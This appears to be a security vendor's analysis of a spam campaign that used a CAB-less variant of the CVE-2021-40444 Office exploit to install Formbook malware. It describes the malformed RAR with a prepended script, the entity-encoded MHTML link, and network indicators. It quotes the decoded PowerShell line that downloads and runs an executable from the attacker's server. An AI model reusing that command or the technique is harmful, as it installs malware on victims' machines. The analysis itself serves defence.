[Update (2021-12-23 1:00pm EST): A previous version of this story stated that the malformed RAR archive could not be opened in an earlier build of the WinRAR archiver. We have updated the story to explain how the RAR5 standard has changed and that WinRAR and other archiving tools now treat data preceding the Rar! magic bytes as if the archive contained self-extracting code. We have also tested the exploit on a testbed that has had the September, 2021 Cumulative Update, and while the Word document still was able to make a connection attempt, the remainder of the attack would not have completed due to the patch. We are unable to fully test this, because the malicious website hosting the exploit code has been shut down. We have added the label “[Updated]” to paragraphs that have been corrected. We apologize for giving a misleading impression that the exploit fully functions on a computer with the September (or later) Cumulative Updates installed.]
[Update (2021-12-23 10:00am EST): an earlier version of this post suggested the CAB-less exploit shown here works on systems that have the September 2021 patch for CVE-2021-40444. That is not the case; the patch corrected the issue. The attack was only successful on unpatched Windows systems. Thanks to Mitja Kolsek of ACROS Security and Will Dormann at CERT/CC for pointing out the error.]
Back in September, Microsoft published a series of mitigation steps and released a patch to a serious bug (designated CVE-2021-40444) in the Office suite of products. Criminals began exploiting the Microsoft MSHTML Remote Code Execution Vulnerability at least a week before September’s Patch Tuesday, but the early mitigations (which involved disabling the installation of ActiveX controls), and the patch (released a week later), were mostly successful at stopping the exploits that criminals had been attempting to leverage to install malware.
Soon after Microsoft published these solutions, attackers morphed the attack in an attempt to get around the patch’s protection.
Between October 24 and 25, we received a small number of spam email samples that contained weaponized file attachments; The attachments represent an escalation of the attacker’s abuse of the -40444 bug and demonstrate that even a patch can’t always mitigate the actions of a motivated and sufficiently skilled attacker.
Each of the messages shared the same body content, FROM: address, and malicious attachment.
In the initial versions of CVE-2021-40444 exploits, malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file. When Microsoft’s patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially-crafted RAR archive. Because it doesn’t actually use the CAB-style attack method, we’ve called it the CAB-less 40444 exploit. However, while it may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack, the changes in the September patch block the behavior described below.
How the attack transpired
Over a period of a bit more than a day, the attackers sent out spam emails that look like this one. The only viable samples we received came in messages with an identical message body and From: address. The message body contains two street addresses in Hungary, but used a From: address with a domain that was slightly different from that of a real business based in Jamaica seemingly unconnected to the attack.
Attached to the message was an archive file named Profile.rar. RAR archives are not unique or unusual as malicious file attachments, but this one had been malformed. Prepended to the RAR file was a script written in Windows Scripting Host notation, with the malicious Word document immediately following the script text.
[Updated] WinRAR (and some other compression utilities) treat any data preceding the “Rar!” header of a RAR file (shown in the image below), as a self extracting archive, but do no other checking of that data, such as making a determination that it is, in fact, self-extracting archive code. Archiving utilities that support self extracting archives would therefore still be able to decompress this.
[Updated] If a user decompresses this malicious RAR attachment and then opens the Word document, the exploit triggers.
In a tool like Process Explorer, shown below, the Word document appears to invoke the RAR archive itself as though it were a Windows Scripting Host (WSH) script, a weird sort of circular reference that (in theory) shouldn’t work, but does. Windows allows these kinds of scripts to mix together other scripting formats. Process Explorer shows the command line as wscript.exe “.wsf:../../../[path where RAR was saved]/Profile.rar?.wsf”Because the text of the script appears before the magic bytes of the archive, the Windows Scripting Host process wscript.exe successfully invokes the embedded PowerShell command in the RAR file.
That PowerShell command decodes a long string of base64-encoded text, which is itself a separate scripting command that instructs PowerShell to retrieve a malware executable from a remote website, and run it on the system as dllhostSvc.exe.
Why does this work?
[Updated] In theory, this attack just shouldn’t work. For systems that had the September update, it doesn’t. But in the timeframe of the attack, some systems may not have been patched yet. It also worked because the compression utility treated the file as a self-extracting archive.
As with previous exploits against the -40444 bug, the attackers used an Office document that contains an OLE Object (a mechanism to embed external files or documents), which in a non-malicious document might be used to view or download a web page with JavaScript. But buried in the weaponized .docx (which is just a zipped collection of XML files), inside a file named “word/_rels/document.xml.rels,” the attackers embedded a line of code in the MHTML protocol handler that looked like this.
The attackers knew it would be possible some security vendors would detect the plain text of a URL so they encoded it with XML character entity references. The value of H above declares a hex value of 48, which in ASCII is the letter H, T represents an ASCII T, and P is P… the first letters in the familiar http:// protocol header in a URL.
While there is no VBA or macro in the document that can execute, the attacker prompted the user to “enable content” in the body of the Word document. Doing so triggers the computer to load a page at hxxp://104.244.78.177/Profile.html (obfuscation intentional).
[Updated] In a test of this functionality on a testbed on which the September update had been applied, Word attempts to contact the remote website, before the program displays the document. It is not possible to test whether the full attack would be successful now, because the website hosting the malicious code has been offline for several weeks.
When we navigated to that page (when it was still live) in a browser, we only saw an Apache welcome page:
However, when we looked more closely at the source code of that page, there was some unusual, obfuscated Javascript code there.
[Updated] The JavaScript on the page would be executed within Office on an unpatched system. The patch would have blocked the installation of any ActiveX controls in the context of Microsoft Word. The script used was an obfuscated version of the JavaScript already published in a proof-of-concept for this technique to launch that original RAR file as a WSF.
Once the file is found, wscript.exe will run the WSF code, which in turn launches PowerShell. As mentioned previously, the attack uses a base64 encoded PowerShell command. Decoding that reveals the final stage of exploitation:
iex ((new-object system.net.webclient).downloadfile("hxxp://104.244.78.177/abb01.exe","$env:LOCALAPPDATA\dllhostSvc.exe"));Start-Process "$env:LOCALAPPDATA\dllhostSvc.exe"
This resulted in the computer downloading a malicious file into “AppData\Local” and launching it. The Labs team later confirmed that this EXE was a sample of a malware family called Formbook.
Noisy over the network
This attack was particularly noisy from a network perspective.
The Javascript that runs on the Profile.html page creates a series of network requests that was somewhat bizarre. The practical effect of the Javascript deobfuscating itself as it runs causes a noticeable delay in the execution of the script, taking from five to eight seconds to complete the infection process and generating distinctive network traffic in the process.
The script running on Profile.html triggers the computer to make multiple requests to the page using different HTTP request “verbs” – not only the typical GET request, but also HEAD, OPTIONS, and PROPFIND. It’s this last HTTP request type that’s of interest not only because it’s unusual, but because the purpose of that request type is for XML documents to request web-based resources – exactly what the exploit does.
At the end of this process, the script triggers Word to run the Windows Script Host, pointing it at the .rar file. The script invokes PowerShell, which (eventually) downloads the Formbook payload. Noticeably, while the other HTTP requests in this process all have User-Agent strings, the final request that delivers the malware executable does not. Notably, the User-Agents that do get used during these requests make no sense: Some of the requests pretend to be from an Internet Explorer 7 browser running on a version of Windows 8 that’s five years past its best by date, and others appear to use the User-Agent string of Microsoft Office Existence Discovery.
As for the malware payload itself, Formbook is an extremely noisy customer. The malware communicated with more than 50 servers over the course of about 18 hours, generating a huge number of web requests that were also distinctive in that the bot connected to a URL with the string /zxsc/ in the URI path on each server, and without a User-Agent in the request header. It made many HTTP connections per minute following this pattern, which would be extremely obvious to anyone monitoring the network for unusually high volumes of anomalous activity. But many don’t.
Patching quickly when exploits strike
This modified exploit disappeared after only a day in use, likely because of a low success rate because of the September patch.
[Updated] One thing that we noticed in the course of this investigation is that the older version of WinRAR on the test system could not function with these modified rar archive files. Recent editions of the program did not have this problem. When we originally tested this on a testbed machine, the version of WinRAR installed on it (3.61) could not open the archive, throwing an error.
[Updated] After communicating with the developers of the WinRAR archiving program, they explained that this particular version of WinRAR would not have supported the RAR5 self-extracting archive format, which is probably the reason why it reported the error message. When we installed the newest available build of WinRAR (6.10 beta 3), it was able to successfully open and extract the maldoc from the archive file.
[Updated] So, unexpectedly, in this case, users of this specific, much older, outdated version of WinRAR would not have been able to unpack the archive, though not as a result of any deliberate effort.
[Updated] While that’s clearly unusual behavior, we wouldn’t recommend that you downgrade to an unsupported version of an archiver utility just because it broke this edge-case attack. Our conventional advice still applies here: When Microsoft publishes warnings about exploits being used “in the wild,” this is what they mean. Someone, or some group of people, was already using this exploit in a spam campaign, implementing it as soon as they discovered the technique and could turn it into an operational campaign.
But patching alone cannot prevent all vulnerabilities, in every case. Enabling all the restrictions that would prevent a user from accidentally triggering a maldoc helps somewhat, but people can (and frequently are) fooled into clicking that “Enable content” button. Learning that doing this is, generally, a bad idea isn’t hard, but it needs to be reinforced. Training yourself to be reflexively suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies you don’t know, sounds like a simple thing but it takes practice to recognize when something’s amiss. Learn to trust your instincts and check with the sender (or a knowlegeable person in the IT team) if you run into something like this – preferably before opening it.
Detection guidance
Sophos endpoint products will detect the weaponized document files that contain the CABless -40444 exploit as Troj/DocDL-AEOL; Sophos endpoint products generically detect Formbook malware based on longstanding static analysis rules. We’ve published indicators relating to samples investigated in this report on the SophosLabs Github page and updated it with additional IOCs including the Profile.html page.